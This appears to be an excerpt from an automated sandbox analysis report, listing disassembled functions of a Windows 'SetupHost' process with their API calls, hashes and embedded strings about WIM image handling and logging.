                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Alloc$wcschr$Free$_wcsicmp
                                                                                                                                                                                                                • String ID: [*]
                                                                                                                                                                                                                • API String ID: 3095872602-3843684642
                                                                                                                                                                                                                • Opcode ID: 8a7f7142b04c6091deee0194357bfb09c8f1bb7cd23d1c3bd5119e3b3f926b21
                                                                                                                                                                                                                • Instruction ID: 9879c36d34371057192a65683bd1be1ebc431ea40d6b3764d1b9b9c0dc3fb62a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a7f7142b04c6091deee0194357bfb09c8f1bb7cd23d1c3bd5119e3b3f926b21
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2126F76E0050A9FCB14DF98C851FAEB7B6FF88310F25856DE906AB350DA35AD02CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E7831
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,?), ref: 009E7899
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(?,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D22
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D29
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(00000001,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D75
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D7C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 009E78F3
                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009E7986
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,?,?,?), ref: 009E79E6
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009E79ED
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 009E7E33
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E7E3A
                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,?,?), ref: 009E7E4B
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,?,?), ref: 009E7E72
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001,?,00000000,?,00000000,?,?,?,?), ref: 009E7ED0
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLastProcess$Alloc$FileFreeSizeUnothrow_t@std@@@__ehfuncinfo$??2@memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3889880820-0
                                                                                                                                                                                                                • Opcode ID: 410f438acfd4918d0f20b5e82abd359d1f0b7724554ad61651cb2fead2dd7b68
                                                                                                                                                                                                                • Instruction ID: 3367d2c5e0de5de8b1c591b5babb58f377e2ffc172b15f935caf374be45b1341
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 410f438acfd4918d0f20b5e82abd359d1f0b7724554ad61651cb2fead2dd7b68
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23220AB1E042698BCB65CF6ACC8079DF7B9AB88310F1485E9E60DA3241D7309EC58F59
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,?,00000000,00000000), ref: 009E8B12
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E8B1C
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E8B34
                                                                                                                                                                                                                  • Part of subcall function 009ECEB0: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,009E8B82), ref: 009ECECB
                                                                                                                                                                                                                  • Part of subcall function 009ECEB0: LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,009E8B82), ref: 009ECEE2
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(?,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D22
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D29
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: GetProcessHeap.KERNEL32(00000001,00100010,00000000,?,00000001,?,?,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D75
                                                                                                                                                                                                                  • Part of subcall function 009E1CBE: HeapAlloc.KERNEL32(00000000,?,009E3764,00000000,00000000,00000000,?,00000000), ref: 009E1D7C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000), ref: 009E8BA6
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009E8BBE
                                                                                                                                                                                                                • BCryptHashData.BCRYPT(?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 009E8C5A
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009E8CB2
                                                                                                                                                                                                                • BCryptDestroyHash.BCRYPT(?,?,00000000,00000000), ref: 009E8DB6
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 009E8DBD
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$Process$AllocCriticalCryptFreeHashResourceSection$AcquireCurrentDataDestroyEnterFileLeaveLocalReleaseSharedSizeThreadmemcpy
                                                                                                                                                                                                                • String ID: ChunkWriterEnqueue
                                                                                                                                                                                                                • API String ID: 2494432688-1716695059
                                                                                                                                                                                                                • Opcode ID: 222a33f2d881b5b2aa2990613cb0cd34288473c687170e0610648e0a3710fdf7
                                                                                                                                                                                                                • Instruction ID: 32c1b9623b5418a7ccebb270f0d3a3804a2e871197846eaa48a54acc8e4e2981
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 222a33f2d881b5b2aa2990613cb0cd34288473c687170e0610648e0a3710fdf7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B16375E002599BDB16CFDADC849AEBBB5FF58310B244529E909E7390DB30DC41CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(009FF3E0), ref: 00A0013F
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A0014F
                                                                                                                                                                                                                • TlsFree.KERNEL32 ref: 00A00161
                                                                                                                                                                                                                • TlsGetValue.KERNEL32 ref: 00A00174
                                                                                                                                                                                                                • TlsFree.KERNEL32 ref: 00A001A2
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00A166F8), ref: 00A001B4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000), ref: 00A001D8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A001DF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,005D5AA0), ref: 00A001F7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A001FE
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00A166F8), ref: 00A0021B
                                                                                                                                                                                                                  • Part of subcall function 00A00241: GetProcessHeap.KERNEL32(00000000,00000008,?,00A00189), ref: 00A0029E
                                                                                                                                                                                                                  • Part of subcall function 00A00241: HeapFree.KERNEL32(00000000,?,00A00189), ref: 00A002A5
                                                                                                                                                                                                                  • Part of subcall function 00A00241: GetProcessHeap.KERNEL32(00000000,00000000,?,00A00189), ref: 00A002B5
                                                                                                                                                                                                                  • Part of subcall function 00A00241: HeapFree.KERNEL32(00000000,?,00A00189), ref: 00A002BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Free$Process$CriticalExceptionFilterSectionUnhandled$EnterLeaveValue
                                                                                                                                                                                                                • String ID: WdsSetupLogInit
                                                                                                                                                                                                                • API String ID: 2436732932-3317556560
                                                                                                                                                                                                                • Opcode ID: 84699b0b4240209ba5b08bb767efa467ee1242f82abc17d9d9dcfb843a324693
                                                                                                                                                                                                                • Instruction ID: 7916d4b552527a379a7d526a3ef512e8fa761a33d7a75a4f5184eb14984b0d8c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84699b0b4240209ba5b08bb767efa467ee1242f82abc17d9d9dcfb843a324693
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B311879601215AFC714DFE4FD88AEE3BBABB587917049629F942D72E0CB718C438B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,80070055,00000000,00000000,00000000,?,?,?,?,?,009DDC86,?,00000000,00000000,00000000), ref: 009DF856
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 009DF867
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,009DDC86,?,00000000,00000000,00000000,?,009DE028,?,00000000,00000000,009DE358), ref: 009DF87E
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,009DDC86,?,00000000,00000000,00000000,?,009DE028,?,00000000,00000000,009DE358), ref: 009DF896
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,009DDC86,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009DF8B5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DF8BC
                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 009DF8F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 009DF901
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DF908
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,?,?,?,?,009DDC86,?,00000000,00000000,00000000,?,009DE028), ref: 009DF933
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorFreeLast$Process$AllocLocalmemcpy
                                                                                                                                                                                                                • String ID: WIM\IMAGE[*]
                                                                                                                                                                                                                • API String ID: 806695159-3931796516
                                                                                                                                                                                                                • Opcode ID: b49c0d9c73e8ea3b500f3b1312f6bb13ec7f1a51be1883cf56d07e721421970c
                                                                                                                                                                                                                • Instruction ID: e314170c852a69fad60ea6b826d110ddf7d0b4300876b81da11761b4d4fe1054
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b49c0d9c73e8ea3b500f3b1312f6bb13ec7f1a51be1883cf56d07e721421970c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F761D031E40305ABDB15DFE8C8A2BAE77B9AF48710F18847AEA03EB350D6749D419B51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009DD224
                                                                                                                                                                                                                  • Part of subcall function 009E0504: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,009DDF5C,00000000,00000000,00000000,?,00000000,00000000,009DE358), ref: 009E053D
                                                                                                                                                                                                                  • Part of subcall function 009E0504: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E056E
                                                                                                                                                                                                                  • Part of subcall function 009E0504: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E0575
                                                                                                                                                                                                                  • Part of subcall function 009E0504: GetFullPathNameW.KERNEL32(?,-00000003,00000000,?), ref: 009E05AE
                                                                                                                                                                                                                  • Part of subcall function 009E0504: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00A10D5A,000000FF), ref: 009E05EF
                                                                                                                                                                                                                  • Part of subcall function 009E0504: HeapFree.KERNEL32(00000000), ref: 009E05F6
                                                                                                                                                                                                                  • Part of subcall function 009E0504: SetLastError.KERNEL32(00000000,?,00000000,00000000,009DE358,?,?,00000000), ref: 009E0640
                                                                                                                                                                                                                • GetLastError.KERNEL32(?), ref: 009DD242
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009DD6D6
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DD6DD
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009DD6E4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$Process$FreeFullNamePath$Alloc
                                                                                                                                                                                                                • String ID: Fail to read WIM header$WIMCreateFile
                                                                                                                                                                                                                • API String ID: 1537709336-3419363894
                                                                                                                                                                                                                • Opcode ID: 5a2a7583bde814373dee14ed88453fb3642b670ef5d1e203daee708703a781f5
                                                                                                                                                                                                                • Instruction ID: c7d73cdcd4b3156346cf242ae4a7b3d3b1fcfbd90b88745409286d5fefefdea2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a2a7583bde814373dee14ed88453fb3642b670ef5d1e203daee708703a781f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1ED1F3307453419BDB16EB768856B7E72AAAFC4704F08C42AF5598B3A2DF34DC02DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000138,?,?,?,?,?,009CCA94,?,?,?,00000000,00000000), ref: 009CD5D4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,009CCA94,?,?,?,00000000,00000000), ref: 009CD5DB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID: CMicrodom$NewInstance.Allocate()$NewTearoff.Allocate()$Windows::Rtl::CRtlObjectTypeDescription<class MicrodomImplementation::CMicrodom>::CreateInstance$onecore\internal\base\inc\rtl_object_library.h
                                                                                                                                                                                                                • API String ID: 1617791916-4255835702
                                                                                                                                                                                                                • Opcode ID: b8f84787776b82590b736e1c00e8284435ad020ca76e5cdbb9a10aa3fbe55377
                                                                                                                                                                                                                • Instruction ID: d83d24b8a5b4cf41143f4a37d8c81806b27d25a6f0dba8b3c5efb470877ae507
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8f84787776b82590b736e1c00e8284435ad020ca76e5cdbb9a10aa3fbe55377
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55517A70B013059FDF10DFA8C984FADBBB9AF88704B14846DE806AB245DB74D902CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009A1892: _vsnwprintf.MSVCRT ref: 009A18C3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000104,?,?,?,00000000), ref: 009B96C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B96C7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000104,?,?,?,00000000), ref: 009B96D7
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009B96DE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B96ED
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B96F4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000104,?,?,?,00000000), ref: 009B97A3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B97AA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Alloc_vsnwprintf
                                                                                                                                                                                                                • String ID: z
                                                                                                                                                                                                                • API String ID: 869350258-1657960367
                                                                                                                                                                                                                • Opcode ID: 031e70df5b95f665479b985b9e62c0830861d5c612f27dd5be533e53c7bb9685
                                                                                                                                                                                                                • Instruction ID: 127f2c3e11e8e3ee27205631465220f4034b7d4772d9973f466d73c3868dd879
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 031e70df5b95f665479b985b9e62c0830861d5c612f27dd5be533e53c7bb9685
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F51A631B203299BCB14EFA58ED87EE76F9AFDC320F1045ACA609D7251DE749D418B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00A06472
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DebuggerPresent
                                                                                                                                                                                                                • String ID: %S(%d) : $%S(%d) : %S$%s%-20S%S$%s%-S(%S)%S$%s%S
                                                                                                                                                                                                                • API String ID: 1347740429-1649778738
                                                                                                                                                                                                                • Opcode ID: c4e003c1e1fbec4298cd6f9e4ad5a98fe2cba2a5b7524606025ca97c740b067f
                                                                                                                                                                                                                • Instruction ID: 53628387efde1888c61906a187bb0b3c4d99423939eb0ee464e633e642ca2827
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4e003c1e1fbec4298cd6f9e4ad5a98fe2cba2a5b7524606025ca97c740b067f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D71A4B4B001199FCB18DF58DD94ABE7BB5AF89714F144169E805A7391EB30ED02CBA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,009DBCBE,?), ref: 009DB499
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,009DBCBE,?,?), ref: 009DB4D8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                • String ID: ::RtlIsLBlobValid(Blob)$Not-null check failed: Blob$RtlReallocateLBlob$Temp = (*RtlReallocateStringRoutine)(Bytes, Blob->Buffer)$Temp = (PUCHAR)((*RtlAllocateStringRoutine)(Bytes))$onecore\base\lstring\lblob.cpp
                                                                                                                                                                                                                • API String ID: 4292702814-2431276799
                                                                                                                                                                                                                • Opcode ID: ee971fea417d82c139790721548b38c87de4efbfb19f0c693beee971a1b037fc
                                                                                                                                                                                                                • Instruction ID: 141beec4476fc31b9010b032899a5775db903dedcd64c045b53da22d511eb61b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee971fea417d82c139790721548b38c87de4efbfb19f0c693beee971a1b037fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21317CB1841B44EBCF22CF89D948B9EBBF4BB50708F128419E4552B350D7B69E09CF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeHeap$_wcsicmp
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3839862788-0
                                                                                                                                                                                                                • Opcode ID: deb174297fd39af05cd69c32f6f90bdbd134f9567da37875f9cf235208797095
                                                                                                                                                                                                                • Instruction ID: a342375a06176283d6370c0de212c3052a4d6ac4a10ce99850f719868d3f7684
                                                                                                                                                                                                                • Opcode Fuzzy Hash: deb174297fd39af05cd69c32f6f90bdbd134f9567da37875f9cf235208797095
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A9166729083919FD726CF69C880F5BBBE8BB88B54F000A2DF98497250DB74DD05CB92
                                                                                                                                                                                                                Uniqueness

